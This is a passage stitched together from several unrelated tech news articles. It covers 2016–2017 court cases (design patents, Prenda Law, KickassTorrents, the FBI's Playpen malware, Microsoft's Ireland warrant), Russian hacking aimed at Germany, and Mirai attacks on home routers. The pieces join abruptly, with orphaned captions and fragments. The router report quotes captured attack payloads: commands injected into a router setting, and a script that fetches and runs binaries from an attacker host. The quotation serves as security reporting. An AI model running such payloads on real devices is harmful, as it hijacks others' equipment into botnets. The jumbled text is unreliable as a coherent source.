But the MP3tunes precedent shows that innovators who cross the music industry still must risk paying a heavy price. In an opinion published December 6, the US Supreme Court stopped Apple from collecting $399 million in patent infringement damages from Samsung over iPhone-related design patents.

The high court held that the lower court erred when it allowed Apple to automatically collect "lost profits" damages based on the entire value of a phone.
It was the first time in more than a century that the Supreme Court took a case involving design patents. Pictured above is one of the infringed patents, D618,677, describing a black rectangle with rounded corners. The lawyers behind Prenda Law were denounced in 2013 by a federal judge who called them a "porno-trolling collective" that had abused federal courts.
In December 2016, two of those lawyers, John Steele and Paul Hansmeier, were arrested and charged with fraud and perjury. Pictured above is John Steele's banner advertisement from his old firm, which practiced family law. Two band members of 60's rock band The Turtles, pictured above, have turned the once-obscure issue of pre-1972 songs into a hot copyright issue.

The Turtles sued Sirius XM and Pandora, demanding royalties for their old sound recordings, which are not protected by federal law.
Sirius and Pandora lost key legal battles in 2015, and Sirius paid out a $210 million settlement to record labels.

But the Turtles case went on, and on Dec. 21, 2016 the New York Court of Appeals handed a big victory to Sirius, saying that the state's common law offered no copyright protection for pre-1972 recordings.

The decision may be influential in other states. Nokia and Apple fought each other over smartphone patents between 2009 and 2011, but settled their case. Nokia has backed out out of the smartphone business, but is still licensing its patents, so the two companies are back at war. Nokia has sued Apple over patents in 11 different countries. Meanwhile, Apple has filed an antitrust lawsuit against Nokia, accusing the Finnish firm of working together with "patent-assertion entities"—a.k.a. patent trolls—to "maximize the royalties that can be extracted from product companies."

Is an NSA contractor the next Snowden? In 2017, we hope...

EnlargeGetty Images News reader comments 6 Share this story We covered a ton of legal cases in 2016. The entire Apple encryption saga probably grabbed the gold medal in terms of importance. However, our coverage of a California fisherman who took a government science buoy hostage was definitely our favorite.

The case was dropped in May 2016 after the fisherman gave the buoy back. Among others, we had plenty of laser strike cases to cover.

There were guilty verdicts and sentencing in the red-light camera scandal that consumed Chicago.

The Federal Trade Commission settled its lawsuit with Butterfly Labs, a failed startup that mined Bitcoins.

A man in Sacramento, California, pleaded guilty to one count of unlawful manufacture of a firearm and one count of dealing firearms—he was using a CNC mill to help people make anonymous, untraceable AR-15s. While we do our best to cover a wide variety of civil and criminal cases, there are five that stand out to us in 2017.

These cases range from privacy and encryption, to government-sanctioned hacking, to the future of drone law in America. Drone's up, don't shoot Case: Boggs v. MeridethStatus: Pending in US District Court for the Western District of Kentucky In 2016, we reported on another drone shooting incident (seriously folks, don’t do it!) in Virginia.

A 65-year-old named Jennifer Youngman used her 20-gauge shotgun to take out what many locals believe was a drone flying over her neighbor, Robert Duvall’s, adjacent property. Yes, that Robert Duvall. “The man is a national treasure and they should leave him the fuck alone,” she told Ars. Youngman touched on a concept that many Americans likely feel in their gut but has not been borne out in the legal system: property owners should be able to use force to keep unwanted drones out of their airspace.

But here’s the thing: for now, American law does not recognize the concept of aerial trespass. At this rate, that recognition will likely take years. Meanwhile, drones get more and more sophisticated and less expensive, and they have even spawned an entire anti-drone industry. Legal scholars have increasingly wondered about the drone situation.

After all, banning all aircraft would be impractical.
So what is the appropriate limit? The best case law on the issue dates back to 1946, long before inexpensive consumer drones were feasible.

That year, the Supreme Court ruled in a case known as United States v.

Causby
that Americans could assert property rights up to 83 feet in the air. In that case, US military aircraft were flying above a North Carolina farm, which disturbed the farmer's sleep and upset his chickens.

As such, the court found that Farmer Causby was owed compensation. However, the same decision also specifically mentioned a "minimum safe altitude of flight" at 500 feet—leaving the zone between 83 and 500 feet as a legal gray area. "The landowner owns at least as much of the space above the ground as he can occupy or use in connection with the land," the court concluded. In 2015, a Kentucky man shot down a drone that he believed was flying above his property.

The shooter in that case, William Merideth, was cleared of local charges, including wanton endangerment. By January 2016, the Kentucky drone's pilot, David Boggs, filed a lawsuit asking a federal court in Louisville to make a legal determination as to whether his drone’s flight constituted trespassing.

Boggs asked the court to rule that there was no trespass and that he is therefore entitled to damages of $1,500 for his destroyed drone. Although the two sides have traded court filings for months, the docket has not been updated since June 2016, when Boggs’ attorneys pointed to a recent case out of Connecticut that found in favor of the Federal Aviation Administration’s regulation of drones. As Boggs’ legal team wrote: The Haughwout pleadings are directly relevant to the subject matter jurisdiction issue currently before the court.

The current dispute turns on whether a controversy has arisen that cannot be resolved without the Court addressing a critical federal question—the balance between the protection of private property rights versus the safe navigation of federal airspace.

The Haughwout dispute places this critical question in the context of an administrative investigation.
It highlights, as argued by Mr.

Boggs—and now the FAA—that questions involving the regulation of the flight of unmanned aircraft should be resolved by Federal courts. US District Judge David J. Hale has yet to schedule any hearings on the matter. Flood of torrents Case: United States v.
Vaulin
Status: Pending in the US District Court for the Northern District of Illinois In July 2016, federal authorities arrested the alleged founder of KickassTorrents (KAT).

The arrest was part of what is probably the largest federal criminal complaint in an intellectual property case since Megaupload, which was shuttered in early 2012. (That site’s founder, Kim Dotcom, has successfully beat back efforts to extradite him from New Zealand to the United States. He was ordered extradited a year ago, but that court decision is now on appeal.) In the case of KAT, Ukranian Artem Vaulin, 30, was formally charged with one count of conspiracy to commit criminal copyright infringement, one count of conspiracy to commit money laundering, and two counts of criminal copyright infringement.
Vaulin was arrested in Poland, where he remains in custody pending a possible extradition to the United States. Like The Pirate Bay, KAT does not host individual infringing files but rather provides torrent and magnet links so that users can download unauthorized copies of TV shows, movies, and more from various BitTorrent users. According to the 50-page affidavit, Vaulin and KAT’s claims that they respected the Digital Millennium Copyright Act were hogwash.

The affidavit was authored by Jared Der-Yeghiayan, who is a special agent with Homeland Securities Investigations and was also a key witness in the trial of Silk Road founder Ross Ulbricht. Vaulin has since retained Dotcom’s lawyer, Ira Rothken, who has made similar arguments in court filings on behalf of his more famous client. Namely, that there is no such thing as secondary criminal copyright infringement, and while some files uploaded to KAT may have violated copyright, that does not make Vaulin a criminal. Rothken has not yet been able to directly correspond with or even meet his Ukrainian client (and has to do so only through Polish counsel). Nevertheless, he filed a motion to dismiss in October 2016.

The government responded weeks later, and Rothken filed another response on November 18. Prosecutors, for their part, said that the Rothken-Vaulin theory was ludicrous: “For the defendant to claim immunity from prosecution because he earned money by directing users to download infringing content from other users is much like a drug broker claiming immunity because he never touched the drugs.” The two sides met before US District Judge John Z. Lee for a status conference on December 20, 2016. Judge Lee has not yet ruled on the motion to dismiss. Hoarder vs. Hacker Case: United States v. MartinStatus: Pending in the US District Court for the District of Maryland While everyone knows about Edward Snowden and the shockwaves he sent through the intelligence community in 2013, fewer people know the name Harold “Hal” Martin. Martin, like Snowden, was a contractor for the National Security Agency at Booz Allen Hamilton and held a top-secret clearance.
In August, he was arrested and criminally charged with “unauthorized removal and retention of classified materials by a government employee or contractor.” Prosecutors alleged that Martin had a substantial amount of materials that should never have left government custody. Unlike Snowden, it’s unclear whether Martin is simply a “hoarder” (as his own lawyer argued) or whether he was someone who meant to sell, divulge, or disclose classified NSA material. (Recent years have seen several unsolved leaks of classified material, including a source that provided intelligence materials that were published by the German magazine Der Spiegel.
In August 2016, there was the “Shadow Brokers” dump of NSA exploits. Neither leak has been definitively attributed.) Two months later, when news of his arrest became public, Martin was immediately fired and stripped of his clearance.

An October 20 filing states that Martin also took home “six full bankers’ boxes” worth of paper documents, many of which were marked “Secret” or “Top Secret.” The documents are dated from 1996 to 2016. “The weight of the evidence against the Defendant is overwhelming,” the government plainly stated in its filing, which continued: For example, the search of the Defendant’s car revealed a printed email chain marked as “Top Secret” and containing highly sensitive information.

The document appears to have been printed by the Defendant from an official government account. On the back of the document are handwritten notes describing the NSA’s classified computer infrastructure and detailed descriptions of classified technical operations.

The handwritten notes also include descriptions of the most basic concepts associated with classified operations, as if the notes were intended for an audience outside of the Intelligence Community unfamiliar with the details of its operations. The docket in Martin’s case has not advanced since October 31.

For now, he remains in custody. No further hearings have been scheduled. You say NIT, I say malware Case: United States v.

Croghan
Status: Appeal pending in 8th US Circuit Court of Appeals On December 1, a change to a section of the Federal Rule of Criminal Procedure went into effect. Under the revised Rule 41, any magistrate judge is now allowed to issue warrants authorizing government-sanctioned hacking anywhere in the country. Prior to that, magistrates could only sign off on warrants within their own federal district. As Ars has reported previously, for more than two years now, the Department of Justice has pushed to change Rule 41 in the name of thwarting online criminal behavior enabled by tools like Tor. The rule change might have gone unnoticed if not for over 100 child porn cases.

The cases are currently being prosecuted nationwide against suspects accused of accessing a Tor-hidden website called Playpen. Many of those cases have progressed “normally,” or at least as “normally” as child porn cases can progress.

But some suspects have challenged the use of what the government calls a “network investigative technique” (NIT), which security experts have dubbed as malware. As Ars reported before, investigators in early 2015 used the NIT to force Playpen users to cough up their actual IP address, which made tracking them trivial.
In another related case prosecuted out of New York, an FBI search warrant affidavit described both the types of child pornography available to Playpen's 150,000 members and the malware's capabilities. As a way to ensnare users, the FBI took control of Playpen. Playpen users came to the site with their Tor-enabled digital shields down, revealing their true IP addresses.

The FBI was able to identify and arrest nearly 200 child porn suspects.

After 13 days, the FBI shut Playpen down. However, nearly 1,000 IP addresses were revealed as a result of the NIT’s deployment, which suggests that even more charges could be filed. Beau Croghan, a man in Iowa, was one of those hit by this NIT. He’s accused of downloading child porn via Playpen. However, this past year, his case was just one of three in which a judge ruled to suppress the evidence due to a defective warrant. In 2016, federal judges in Massachusetts and Oklahoma made similar rulings and similarly tossed the relevant evidence.

Thirteen other judges, meanwhile, have found that, while the warrants to search the defendants' computers via the hacking tool were invalid, they did not take the extra step of ordering suppression of the evidence.

The corresponding judges in the remainder of the cases have yet to rule on the warrant question. In Croghan’s case, however, US District Judge Robert Pratt seemed to have a clear understanding as to how the NIT worked. He rebuked the government’s arguments. Judge Pratt wrote: Here, by contrast, law enforcement caused an NIT to be deployed directly onto Defendants’ home computers, which then caused those computers to relay specific information stored on those computers to the Government without Defendants’ consent or knowledge.

There is a significant difference between obtaining an IP address from a third party and obtaining it directly from a defendant’s computer. In November, the government appealed the ruling up to the 8th Circuit, arguing that the district court had gotten it wrong: ordering suppression of the evidence was going too far. As prosecutors argued in their November 22 filing: The facts of this case fall comfortably within this body of law and mandate the same result.

Assuming that the NIT Warrant was void because the magistrate judge lacked territorial authority to issue it, and further assuming that the FBI’s use of the NIT thereby amounted to an unconstitutional warrantless search or was somehow prejudicial, suppression is not warranted because the agents acted in objectively reasonable reliance on the subsequently invalidated warrant and were not culpable for the magistrate judge’s purported error. Croghan’s attorneys have been ordered to file their response by January 12, 2017. Hands off Case: United States of America v.
In the matter of a Warrant to Microsoft, Inc.
Status: Appeal pending en banc in 2nd US Circuit Court of Appeals It’s a case that’s being watched closely by many in the privacy community and the tech industry: Apple, the American Civil Liberties Union, BSA The Software Alliance, AT&T, Rackspace, Amazon, and others have joined in as amici. The question before the court was simple: does the Stored Communications Act, an American law that allows domestically held data to be handed over to the government, apply abroad? In other words: can the government order an American company (Microsoft) to give up data held overseas (in this case, in Ireland)? In July 2016, the 2nd Circuit said no. The case dates back to December 2013, when authorities obtained an SCA warrant, which was signed by a judge, as part of a drug investigation.

The authorities served it upon Microsoft, but when the company refused to comply, a lower court held the company in contempt. Microsoft challenged that, too.

The 2nd Circuit has vacated the contempt of court order, writing: The SCA warrant in this case may not lawfully be used to compel Microsoft to produce to the government the contents of a customer’s e‐mail account stored exclusively in Ireland.

Because Microsoft has otherwise complied with the Warrant, it has no remaining lawful obligation to produce materials to the government. What the government hopes would be revealed by acquiring the e-mail is not publicly known.

The authorities have also not revealed whether the e-mail account owner is American or if that person has been charged with a crime related to the drug investigation. On October 13, the government filed its en banc appeal before a full panel of judges at the 2nd Circuit, which has not formally decided to hear the case. As prosecutors wrote in that filing: There is no infringement of the customer’s privacy interest in his email content based on where Microsoft, at any given moment, chooses to store that content. Rather, the privacy intrusion occurs only when Microsoft turns over the content to the Government, which occurs in the United States.

The majority’s conclusion that the intrusion instead occurs where Microsoft “accessed” or “seized” the email content, Op. 39, is plainly wrong, because Microsoft could “access” or “seize” the email content on its own volition at any time and move it into the United States, or to China or Russia, or anywhere it chose, and the content would remain under Microsoft’s custody and control and the subscriber could not be heard to complain, unless and until the content were disclosed to the Government or another party.

This point is amply demonstrated by the concession of both Microsoft and the majority that Microsoft would have to comply with the Warrant if it had chosen (without consulting the subscriber) to move the target email account into the United States, even mere moments before the Warrant was served. Microsoft has not yet filed its response.

Fancy Bear ramping up infowar against Germany—and rest of West

Enlarge / The bear is back.
It never went away.reader comments 40 Share this story US intelligence agencies have been forthright in their insistence that the Russian government was behind not only the hacking of the Democratic National Committee (DNC) and other political organizations in the US, but a concerted effort to undermine confidence in the results of the US presidential election, including attacks on state election officials' systems.

But the US is not the only country that the Russian government has apparently targeted for these sorts of operations—and the methods used in the DNC hack are being applied increasingly in attempts to influence German politics, Germany's chief of domestic intelligence warned yesterday. In a press release issued on December 8, Germany's Bundesamt für Verfassungsshutz (BfV), the country's domestic intelligence agency, warned of an ever-mounting wave of disinformation and hacking campaigns by Russia focused on increasing the strength of "extremist groups and parties" in Germany and destabilizing the German government.
In addition to propaganda and disinformation campaigns launched through social media, the BfV noted an increased number of "spear phishing attacks against German political parties and parliamentary groups" using the same sort of malware used against the Democratic National Committee in the US. The statement from the BfV came on the same day that Alex Younger, the chief of the United Kingdom's Secret Intelligence Service (MI6) made more veiled references to disinformation and hacking campaigns.
In remarks Younger delivered at Vauxhall Cross, MI6 headquarters, he warned of the mounting risks posed by "hybrid warfare." "The connectivity that is at the heart of globalization can be exploited by States with hostile intent to further their aims deniably," Younger said. "They do this through means as varied as cyber-attacks, propaganda or subversion of democratic process… The risks at stake are profound and represent a fundamental threat to our sovereignty; they should be a concern to all those who share democratic values." The statement from the BfV follows one by German Chancellor Angela Merkel last week voicing concerns that Russia would attempt to interfere in the 2017 German elections.
In the release, BfV Chief Hans-Georg Maassen warned that these "propaganda and disinformation attacks, cyber espionage, and cyber sabotage are part of hybrid threats against Western democracies." He added that the way people use social media to obtain news was aiding disinformation campaigns. "We are concerned that echo chambers are emerging that make the formation of domestic political opinions highly vulnerable to automated opinion-shaping," Maassen warned. The campaign includes the "enormous use of financial resources" to fund disinformation campaigns, the BfV reported.

The disinformation campaigns have been accompanied by an increase in targeted malware attacks on German politicians.

The BfV attributed these attacks to the threat group known as APT 28, also known as Fancy Bear—a group that US intelligence and information security researchers have tied to Russian intelligence.
In 2015, APT 28 "successfully exfiltrated data from the German Bundestag," Germany's parliament, the BfV release noted. Many of these attacks have been launched as "false flag" operations—with the attackers posing as "hacktivists," much as Guccifer 2.0 and the DC Leaks campaigns tied to APT 28 did. The combined use of disinformation in social media and in state-funded media, social media "trolling," and concerted hacking efforts against political institutions is part of a long pattern of behavior by Russia, shaped by Russia's doctrine of information warfare and deterrence. Russia is generally believed to have been behind cyber-attacks and propaganda operations against Estonia and Ukraine, among other former Soviet states, and has reportedly been behind similar operations in Poland. Given the effect that the DNC hack and other information warfare had in the US—not necessarily influencing the final results, but creating the impression that Russia could directly interfere in US politics—Estonian Foreign Minister Sven Mikser told Reuters at a meeting of the Organization for Security and Cooperation in Europe on December 8, "It's a pretty safe bet that they will try to do it again, and they will try to surprise us.

That’s something that we should be very careful to look at and try to protect ourselves from."

Newly discovered router flaw being hammered by in-the-wild attacks

Enlargereader comments 19 Share this story Online criminals—at least some of them wielding the notorious Mirai malware that transforms Internet-of-things devices into powerful denial-of-service cannons—have begun exploiting a critical flaw that may be present in millions of home routers. Routers provided to German and Irish ISP customers for Deutsche Telekom and Eircom, respectively, have already been identified as being vulnerable, according to recently published reports from researchers tracking the attacks.

The attacks exploit weaknesses found in routers made by Zyxel, Speedport, and possibly other manufacturers.

The devices leave Internet port 7547 open to outside connections.

The exploits use the opening to send commands based on the TR-069 and related TR-064 protocols, which ISPs use to remotely manage large fleets of hardware.

According to this advisory published Monday morning by the SANS Internet Storm Center, honeypot servers posing as vulnerable routers are receiving exploits every five to 10 minutes. SANS Dean of Research Johannes Ullrich said in Monday's post that exploits are almost certainly the cause behind an outage that hit Deutsche Telekom customers over the weekend.
In a Facebook update, officials with the German ISP said 900,000 customers are vulnerable to the attacks until they are rebooted and receive an emergency patch.

Earlier this month, researchers at security firm BadCyber reported that the same one-two port 7547/TR-064 exploit hit the home router of a reader in Poland.

They went on to identify D1000 routers supplied by Eircom as also being susceptible and cited this post as support.

The Shodan search engine shows that 41 million devices leave port 7547 open, while about five million expose TR-064 services to the outside world. The attacks started shortly after researchers published attack code that exploited the exposed TR-064 service.
Included as a module for the Metasploit exploitation framework, the attack code opens the port 80 Web interface that enables remote administration.

From there, devices that use default or otherwise weak authentication passwords can be remotely commandeered and made to join botnets that carry out Internet-crippling denial-of-service attacks. BadCyber researchers analyzed one of the malicious payloads that was delivered during the attacks and found it originated from a known Mirai command-and-control server. "The unusual application of TR-064 commands to execute code on routers has been described for the very first time at the beginning of November, and a few days later a relevant Metasploit module had appeared," BadCyber researchers wrote. "It looks like someone decided to weaponize it and create an Internet worm based on Mirai code." All bases covered To infect as many routers as possible, the exploits deliver three separate exploit files, two tailored to devices running different types of MIPS chips and a third that targets routers with ARM silicon. Just like the Metasploit code, the malicious payloads use the exploit to open the remote administration interface and then attempt to log in using three different default passwords.

The attack then closes port 7547 to prevent other criminal enterprises from taking control of the devices.

The researchers wrote: Logins and passwords are obfuscated (or “encrypted”) in the worm code using the same algorithm as does Mirai.

The C&C server resides under timeserver.host domain name, which can be found on the Mirai tracker list.

Also the pseudorandom algorithm to scan IPs... looks like [it is] copied from Mirai source code.
It looks like the author of the malware borrowed the Mirai code and mixed it with the Metasploit module to produce his worm. The malware itself is really friendly as it closes the vulnerability once the router is infected.
It performs the following command: busybox iptables -A INPUT -p tcp --destination-port 7547 -j DROP busybox killall -9 telnetd which should make the device “secure”... until next reboot.

The first one closes port 7547 and the second one kills the telnet service, making it really hard for the ISP to update the device remotely. Today we have seen new attack variants, namely cd /tmp;wget http://l.ocalhost.host/x.sh;chmod 777 x.sh;./x.sh <NewNTPServer1>`cd /tmp;tftp -l 3 -r 1 -g l.ocalhost.host;chmod 777 3;./3`</NewNTPServer1> <NewNTPServer1>`cd /tmp;wget http://l.ocalhost.host/1;chmod 777 1;./1`</NewNTPServer1> In one of them the download method is changed from wget to tftp, while the other one changes binary download to a script.

The script x.sh has the following contents: #!/bin/sh # https://www.instagram.com/p/bxI-TSk3p_/ cd /var/tmp cd /tmp rm -f * wget http://l.ocalhost.host/1 busybox chmod a+x 1 chmod 777 1 ./1 rm -f * wget http://l.ocalhost.host/2 busybox chmod a+x 2 chmod 777 2 ./2 rm -f * wget http://l.ocalhost.host/3 busybox chmod a+x 3 chmod 777 3 ./3 rm -f * wget http://l.ocalhost.host/4 busybox chmod a+x 4 chmod 777 4 ./4 rm -f * wget http://l.ocalhost.host/5 busybox chmod a+x 5 chmod 777 5 ./5 rm -f * wget http://l.ocalhost.host/6 busybox chmod a+x 6 chmod 777 6 ./6 rm -f * wget http://l.ocalhost.host/7 busybox chmod a+x 7 chmod 777 7 ./7 rm -f * Looks like the attacker wants some really wide coverage: 1: ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped 2: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped 3: ELF 32-bit LSB executable, ARM, version 1, statically linked, stripped 4: ELF 32-bit LSB executable, Renesas SH, version 1 (SYSV), statically linked, stripped 5: ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), statically linked, stripped 6: ELF 32-bit MSB executable, SPARC, version 1 (SYSV), statically linked, stripped 7: ELF 32-bit MSB executable, Motorola 68020, version 1 (SYSV), statically linked, stripped According to researchers at security firm Kaspersky, the command-and-control servers are, interestingly, pointing to IP addresses assigned to the US military. "Since there is no Mirai related infrastructure behind this network range, the bots will not receive any further commands until the criminals behind this attack will change the DNS records again," Kaspersky researchers wrote in a blog post published around the same time this article went live. "For sure, this is some kind of trolling from the criminals who conducted the attack." The TR-069 exploit is at least the second major update that Mirai has received since its source code was made public in October.

Additional technical details about the vulnerability are available here. People who want to lock down their routers and have the necessary technical skills should reboot them and immediately check to see if the devices are listening for incoming commands on port 7547.

As mentioned above, most Mirai-infected devices will be locked down and will display few indications of compromise, although frequent reboots have been reported in a least some cases.

Generally speaking, IoT devices are disinfected each time they're restarted.

A good practice is to reboot them and immediately lock them down with a strong password, or, better yet, to disable remote administration.